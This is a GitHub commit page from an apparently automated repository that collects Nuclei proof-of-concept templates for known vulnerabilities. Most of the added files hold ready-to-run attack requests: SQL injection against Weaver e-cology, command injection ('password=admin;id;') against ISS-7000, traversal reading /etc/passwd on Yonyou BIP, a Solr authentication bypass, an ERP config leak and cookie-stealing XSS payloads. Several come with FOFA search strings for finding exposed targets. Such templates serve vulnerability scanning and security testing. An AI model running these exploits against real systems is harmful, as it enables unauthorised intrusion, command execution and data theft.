Skip to content

Commit

Permalink
20241214
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 14, 2024
1 parent 25c05df commit 62bad0f
Show file tree
Hide file tree
Showing 361 changed files with 19,718 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241213
20241214
359 changes: 359 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

29 changes: 29 additions & 0 deletions poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: fanwei-Ecology-LoginSSO-sqli

info:
name: fanwei-Ecology-LoginSSO-sqli
author: PokerSec
severity: high
metadata:
fofasearch: app="泛微-OA(e-cology)"

requests:
- raw:
- |+
GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
matchers:
- type: dsl
condition: and
dsl:
- duration > 3 && duration < 6 && status_code==302



extractors:
- type: dsl
dsl:
- duration
22 changes: 22 additions & 0 deletions poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
id: hamlintek-ISS-7000-login_handler-rce

info:
name: hamlintek-ISS-7000-login_handler-rce
author: PokerSec
severity: critical
metadata:
fofasearch: body="css/login_form_style-06.css"

http:
- raw:
- |
POST /login_handler.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin=
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"uid=0") && contains_all(body,"gid=0") && contains_all(header,"ISS-7000 v2")
59 changes: 59 additions & 0 deletions poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: ider-login-77ccffccfac1bb6eac46823913cc705c

info:
name: >
IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/ider-login/"
google-query: inurl:"/wp-content/plugins/ider-login/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,ider-login,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "ider-login"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.1')
20 changes: 20 additions & 0 deletions poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: mingyuanyun_ERP_GetErpConfig_unauthorized

info:
name: mingyuanyun_ERP_GetErpConfig_unauthorized
author: PokerSec
severity: high
metadata:
fofasearch: body="报表服务已正常运行"


http:
- raw:
- |
GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey")
21 changes: 21 additions & 0 deletions poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
id: solr-PKIAuthenticationPlugin-admin-bypass

info:
name: solr-PKIAuthenticationPlugin-admin-bypass
author: PokerSec
severity: high
metadata:
fofasearch: app="APACHE-Solr"

requests:
- raw:
- |+
GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
Host: {{Hostname}}
SolrAuth: XXXXX
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"system.properties") && contains_all(body,"Eclipse Adoptium")
19 changes: 19 additions & 0 deletions poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
id: yongyou-BIP-nginx-lua-fileread

info:
name: yongyou-BIP-nginx-lua-fileread
author: PokerSec
severity: critical
metadata:
fofasearch: "iuap-apcom-workbench/"

http:
- raw:
- |
GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body,"root:x") && status_code==200 && contains_all(body,"daemon:x") && contains_all(body,"Password","ArrayOfOlapConnection")
59 changes: 59 additions & 0 deletions poc/backup/indeed-wp-superbackup.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1

info:
name: >
Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload
author: topscoder
severity: critical
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/indeed-wp-superbackup/"
google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "indeed-wp-superbackup"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.3.3')
28 changes: 28 additions & 0 deletions poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: fanwei-Ecology-browser-sqli

info:
name: fanwei-Ecology-browser-sqli
author: PokerSec
severity: high
metadata:
fofasearch: app="泛微-OA(e-cology)"

requests:
- raw:
- |-
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
matchers-condition: and
matchers:
- type: word
part: body
words:
- countSql
- baseSql
- type: status
status:
- 200
20 changes: 20 additions & 0 deletions poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: mingyuanyun_ERP_GetErpConfig_unauthorized

info:
name: mingyuanyun_ERP_GetErpConfig_unauthorized
author: PokerSec
severity: high
metadata:
fofasearch: body="报表服务已正常运行"


http:
- raw:
- |
GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey")
29 changes: 29 additions & 0 deletions poc/cve/CVE-2011-5107-2102.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-5107
info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/
tags: cve,cve2011,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2011-5107
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
41 changes: 41 additions & 0 deletions poc/cve/CVE-2014-4536-2354.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
id: CVE-2014-4536

info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
reference:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
- http://wordpress.org/plugins/infusionsoft/changelog
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4536
cwe-id: CWE-79
tags: cve,cve2014,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200

# Enhanced by mp on 2022/02/24
29 changes: 29 additions & 0 deletions poc/cve/CVE-2014-9094-2422.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2014-9094

info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
Loading

0 comments on commit 62bad0f

Please sign in to comment.